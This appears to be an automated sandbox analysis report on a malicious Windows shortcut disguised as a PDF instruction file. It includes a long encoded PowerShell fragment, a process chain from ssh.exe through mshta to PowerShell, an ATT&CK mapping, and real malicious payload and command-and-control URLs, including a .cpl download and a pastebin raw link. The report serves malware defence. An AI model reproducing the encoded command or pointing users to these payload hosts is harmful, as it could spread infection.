dacaaiaajadaawaazaeeaiaagaakaiaagaakakwagacaacqbbaemasabhafiaxqagacaacqawahgamgbgacaaiaajacaaiaajacsaiaagaakawwbdaggaqqbsaf0aiaagaakamabyadiargagacaacqagacaacqaracaaiaajafsaywboaeeacgbdacaaiaajadaawaa3adaaiaagaakaiaagaakakwagacaacqbbagmasabbahiaxqagacaacqawahgangaxacaaiaajacaaiaajacsaiaagaakawwbjaggayqbyaf0aiaagaakamab4adcamwagacaacqagacaacqaracaaiaajafsaqwbiaeeaugbdacaaiaajadaawaa3adqaiaagaakaiaagaakakwagacaacqbbaemasabbahiaxqagacaacqawahganga1acaaiaajacaaiaajacsaiaagaakawwbjaggaqqbyaf0aiaagaakamabyadyamgagacaacqagacaacqaracaaiaajafsaqwboageacgbdacaaiaajadaawaa2adkaiaagaakaiaagaakakwagacaacqbbaemaaabhafiaxqagacaacqawahgangbfacaaiaajacaaiaajacsaiaagaakawwbjaegaqqbyaf0aiaagaakamabyadiarqagacaacqagacaacqaracaaiaajafsaywboaeeaugbdacaaiaajadaaeaa2admaiaagaakaiaagaakakwagacaacqbbaemasabhahiaxqagacaacqawahgangbgacaaiaajacaaiaajacsaiaagaakawwbjaggaqqbyaf0aiaagaakamab4adyaraagacaacqagacaacqaracaaiaajafsaqwboaeeaugbdacaaiaajadaaeaayaeyaiaagaakaiaagaakakwagacaacqbbaemaaabhafiaxqagacaacqawafganwayacaaiaajacaaiaajacsaiaagaakawwbdaggaqqbyaf0aiaagaakamab4adyamqagacaacqagacaacqaracaaiaajafsaqwboaeeaugbdacaaiaajadaaeaa3adcaiaagaakaiaagaakakwagacaacqbbagmaaabhafiaxqagacaacqawahgamgbgacaaiaajacaaiaajacsaiaagaakawwbdaegayqbyaf0aiaagaakamab4admamaagacaacqagacaacqaracaaiaajafsaywbiaeeacgbdacaaiaajadaawaa3adyaiaagaakaiaagaakakwagacaacqbbagmaaabbafiaxqagacaacqawafgamwa2acaaiaajacaaiaajacsaiaagaakawwbdaegaqqbsaf0aiaagaakamabyaduangagacaacqagacaacqaracaaiaajafsaqwboageacgbdacaaiaajadaaeaa2adgaiaagaakaiaagaakakwagacaacqbbaemaaabbafiaxqagacaacqawafganwa2acaaiaajacaaiaajacsaiaagaakawwbdaggayqbsaf0aiaagaakamabyadcamaagacaacqagacaacqaracaaiaajafsaywboageacgbdacaaiaajadaaeaa2adiaiaagaakakqapaa== Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\OpenSSH\ssh.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
        Command and Scripting Interpreter        		1
        DLL Side-Loading        		11
        Process Injection        		11
        Masquerading        		OS Credential Dumping11
        Security Software Discovery        		Remote Services1
        Email Collection        		1
        Web Service        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts2
        PowerShell        		Boot or Logon Initialization Scripts1
        DLL Side-Loading        		31
        Virtualization/Sandbox Evasion        		LSASS Memory11
        Process Discovery        		Remote Desktop Protocol1
        Archive Collected Data        		11
        Encrypted Channel        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
        Process Injection        		Security Account Manager31
        Virtualization/Sandbox Evasion        		SMB/Windows Admin SharesData from Network Shared Drive3
        Ingress Tool Transfer        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        Deobfuscate/Decode Files or Information        		NTDS1
        Application Window Discovery        		Distributed Component Object ModelInput Capture3
        Non-Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Obfuscated Files or Information        		LSA Secrets2
        File and Directory Discovery        		SSHKeylogging14
        Application Layer Protocol        		Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Software Packing        		Cached Domain Credentials23
        System Information Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        DLL Side-Loading        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576547 Sample: Instruction_695-18112-002_R... Startdate: 17/12/2024 Architecture: WINDOWS Score: 100 39 pastebin.com 2->39 41 cndef1.green-pathways.shop 2->41 43 6 other IPs or domains 2->43 59 Malicious sample detected (through community Yara rule) 2->59 61 Antivirus detection for URL or domain 2->61 63 Windows shortcut file (LNK) starts blacklisted processes 2->63 67 7 other signatures 2->67 11 ssh.exe 2 2->11         started        14 svchost.exe 1 1 2->14         started        signatures3 65 Connects to a pastebin service (likely for C&C) 39->65 process4 dnsIp5 71 Windows shortcut file (LNK) starts blacklisted processes 11->71 17 powershell.exe 7 11->17         started        20 conhost.exe 1 11->20         started        53 127.0.0.1 unknown unknown 14->53 signatures6 process7 signatures8 55 Windows shortcut file (LNK) starts blacklisted processes 17->55 57 Found suspicious powershell code related to unpacking or dynamic code loading 17->57 22 powershell.exe 7 17->22         started        25 conhost.exe 17->25         started        process9 signatures10 69 Windows shortcut file (LNK) starts blacklisted processes 22->69 27 mshta.exe 16 22->27         started        process11 dnsIp12 51 cndef1.green-pathways.shop 104.21.83.229, 443, 49704 CLOUDFLARENETUS United States 27->51 73 Windows shortcut file (LNK) starts blacklisted processes 27->73 75 Suspicious powershell command line found 27->75 31 powershell.exe 18 27->31         started        signatures13 process14 signatures15 77 Windows shortcut file (LNK) starts blacklisted processes 31->77 79 Encrypted powershell cmdline option found 31->79 34 powershell.exe 15 21 31->34         started        37 conhost.exe 31->37         started        process16 dnsIp17 45 berb.fitnessclub-filmfanatics.com 104.21.66.20, 443, 49739 CLOUDFLARENETUS United States 34->45 47 pastebin.com 172.67.19.24, 443, 49708 CLOUDFLARENETUS United States 34->47 49 2 other IPs or domains 34->49

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnk35%VirustotalBrowse
        Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnk26%ReversingLabsShortcut.Trojan.Generic
        Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnk100%Joe Sandbox ML

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        https://cndef1.green-pathways.shop/api/reg/z.mp4$global:?0%Avira URL Cloudsafe
        https://cndef1.green-pathways.shop/api/reg/z.mp4f0%Avira URL Cloudsafe
        https://cndef1.green-pathways.shop/api/reg/z.mp4H0%Avira URL Cloudsafe
        https://360.net0%Avira URL Cloudsafe
        https://berb.fitnessclub-filmfanatp0%Avira URL Cloudsafe
        https://cndef1.green-pathways.shop/api/reg/z.mp4U0%Avira URL Cloudsafe
        https://360.net90%Avira URL Cloudsafe
        http://www.360.net0%Avira URL Cloudsafe
        https://cndef1.green-pathways.shop/api/reg/z.mp4https://cndef1.green-pathways.shop/api/reg/z.mp40%Avira URL Cloudsafe
        https://cndef1.green-pathways.shop/api/reg/z.mp4Q0%Avira URL Cloudsafe
        https://360.net/0%Avira URL Cloudsafe
        https://cndef1.green-pathways.shop/api/reg/z.mp4...0%Avira URL Cloudsafe
        https://cndef1.gX0%Avira URL Cloudsafe
        https://cndef1.green-pathways.shop/api/reg/z.mp450%Avira URL Cloudsafe
        https://cndef1.green-pathways.shop/api/reg/z.mp460%Avira URL Cloudsafe
        https://cndef1.green-pathways.shop/api/reg/z.mp410%Avira URL Cloudsafe
        https://berb.fitnessclub-filmfanatics.com100%Avira URL Cloudmalware
        https://cndef1.green-pathways.shop/api/reg/z.mp42S30%Avira URL Cloudsafe
        https://cndef1.green-pathways.shop/api/reg/z.mp4(0%Avira URL Cloudsafe
        https://www.360.net/H0%Avira URL Cloudsafe
        https://cndef1.g0%Avira URL Cloudsafe
        https://cndef1.green-pathways.shop/api/reg/z.mp4https://cndef1.green-pathways.shop/api/reg/z.mp4590%Avira URL Cloudsafe
        http://360.net0%Avira URL Cloudsafe
        https://cndef1.green-pathways.shop/api/reg/z.mp4https://cndef1.green-pathways.shop/api/reg/z.mp4przq0%Avira URL Cloudsafe
        https://cndef1.green-pathways.shop/api/reg/z.mp4https://cndef1.green-pathways.shop/api/reg/z.mp400%Avira URL Cloudsafe
        https://berb.fitnessclub-filmfanatics.com/naailq0.cpl100%Avira URL Cloudmalware
        https://cndef1.green-pathways.shop/api/reg/z.mp4Yi0%Avira URL Cloudsafe
        https://www.360.net/0%Avira URL Cloudsafe
        https://www.360.net0%Avira URL Cloudsafe
        http://berb.fitnessclub-filmfanatics.com100%Avira URL Cloudmalware
        https://cndef1.green-pathways.shop/api/reg/z.mp4C:0%Avira URL Cloudsafe
        https://cndef1.green-pathways.shop/api/reg/z.mp4332c3237382c3237392c3238302c3230302c3237302c3238352c0%Avira URL Cloudsafe
        https://cndef1.green-pathways.shop/api/reg/z.mp4https://cndef1.green-pathways.shop/api/reg/z.mp4http0%Avira URL Cloudsafe
        https://cndef1.green-pathways.shop/a0%Avira URL Cloudsafe
        https://cndef1.green-pathways.shop/api/reg/z.mp40%Avira URL Cloudsafe
        https://cndef1.green-pathways.shop/api/reg/z.mp4owsPowerShel0%Avira URL Cloudsafe
        https://cndef1.green-pathways.shop/api/reg/z.mp4werLMEMhx0%Avira URL Cloudsafe
        https://cndef1.green-pathways.shop/api/reg/z.mp4m0%Avira URL Cloudsafe
        https://cndef1.green-pathways.shop/0%Avira URL Cloudsafe
        https://cndef1.green-pathways.shop/api/reg/z.mp4i0%Avira URL Cloudsafe
        https://cndef1.green-pathways.shop/api/reg/z.mp4p0%Avira URL Cloudsafe
        https://cndef1.green-pathways.shop/api/reg/z.mp4g0%Avira URL Cloudsafe
        https://cndef1.green-pathways.shop/api/reg/z.mp4hZ0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        360.net
        		180.163.242.102
        		truefalse
          		unknown
          www.360.net
          		180.163.242.102
          		truefalse
            		unknown
            cndef1.green-pathways.shop
            		104.21.83.229
            		truetrue
              		unknown
              www.wshifen.com
              		103.235.47.188
              		truefalse
                		high
                berb.fitnessclub-filmfanatics.com
                		104.21.66.20
                		truefalse
                  		unknown
                  pastebin.com
                  		172.67.19.24
                  		truefalse
                    		high
                    www.baidu.com
                    		unknown
                    		unknownfalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://berb.fitnessclub-filmfanatics.com/naailq0.cplfalse
                      • Avira URL Cloud: malware
                      		unknown
                      https://pastebin.com/raw/0v6Vhvpbfalse
                        		high
                        https://www.360.net/false
                        • Avira URL Cloud: safe
                        		unknown
                        https://cndef1.green-pathways.shop/api/reg/z.mp4true
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.baidu.com/false
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://www.cloudflare.com/learning/access-management/phishing-attack/powershell.exe, 00000009.00000002.2356233458.000002950CF37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E954000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://cndef1.green-pathways.shop/api/reg/z.mp4Umshta.exe, 00000005.00000002.2205299876.00000291539E8000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://pss.bdstatic.com/static/superman/font/iconfont-4530e108b6.ttfpowershell.exe, 00000009.00000002.2356233458.000002950CF33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E01C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E950000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950CD67000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://cndef1.green-pathways.shop/api/reg/z.mp4Qmshta.exe, 00000005.00000003.2193889505.000002995662D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2192336221.0000029956626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2191535936.0000029956611000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2208293493.000002995662D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2190659101.00000299565FB000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.360.netpowershell.exe, 00000009.00000002.2356233458.000002950E8F7000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://cndef1.green-pathways.shop/api/reg/z.mp4$global:?powershell.exefalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.microsoft.copowershell.exe, 00000004.00000002.2077643742.0000024FAD3EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://cndef1.green-pathways.shop/api/reg/z.mp4Hmshta.exe, 00000005.00000002.2205957123.0000029153AE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://contoso.com/Licensepowershell.exe, 00000009.00000002.2428867624.000002951CA34000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://cndef1.green-pathways.shop/api/reg/z.mp4fmshta.exe, 00000005.00000002.2205299876.00000291539E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://360.netpowershell.exe, 00000009.00000002.2356233458.000002950E954000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000006.00000003.2103224939.000001FDFEF60000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drfalse
                                    		high
                                    https://aka.ms/pscore6powershell.exe, 00000002.00000002.2085750541.0000018A0E64C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://berb.fitnessclub-filmfanatppowershell.exe, 00000009.00000002.2356233458.000002950E954000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://360.net9powershell.exe, 00000009.00000002.2356233458.000002950CF37000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://cndef1.green-pathways.shop/api/reg/z.mp4https://cndef1.green-pathways.shop/api/reg/z.mp4mshta.exe, 00000005.00000003.2200411563.000002995A682000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2200411563.000002995A67D000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://pss.bdstatic.com/static/superman/font/iconfont-840387fb42.woffpowershell.exe, 00000009.00000002.2356233458.000002950CF33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E01C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E950000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950CD67000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://360.net/powershell.exe, 00000009.00000002.2356233458.000002950CD7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E03F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950CF37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E01C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E954000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950CD67000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://berb.fitnessclub-filmfanatics.compowershell.exe, 00000009.00000002.2356233458.000002950CF37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E954000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://pss.bdstatic.com/static/superman/font/iconfont-fa013548a9.woff2powershell.exe, 00000009.00000002.2356233458.000002950CF33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E01C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E950000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950CD67000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://cndef1.green-pathways.shop/api/reg/z.mp46mshta.exe, 00000005.00000002.2205299876.00000291539E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://cndef1.gXpowershell.exe, 00000004.00000002.2078120843.0000024FADBC7000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://cndef1.green-pathways.shop/api/reg/z.mp4...mshta.exe, 00000005.00000003.2190659101.00000299565E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://cndef1.green-pathways.shop/api/reg/z.mp45mshta.exe, 00000005.00000003.2200411563.000002995A682000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://cndef1.green-pathways.shop/api/reg/z.mp41mshta.exe, 00000005.00000002.2205299876.00000291539E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://cndef1.green-pathways.shop/api/reg/z.mp42S3mshta.exe, 00000005.00000003.2193889505.000002995662D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2192336221.0000029956626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2208293493.000002995662D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://contoso.com/powershell.exe, 00000009.00000002.2428867624.000002951CA34000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.2172223348.0000022C901B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2172223348.0000022C90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2131766032.0000022C805C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2428867624.000002951CB76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2428867624.000002951CA34000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.360.net/Hpowershell.exe, 00000009.00000002.2356233458.000002950E7F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://cndef1.green-pathways.shop/api/reg/z.mp4(mshta.exe, 00000005.00000003.2200411563.000002995A67D000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
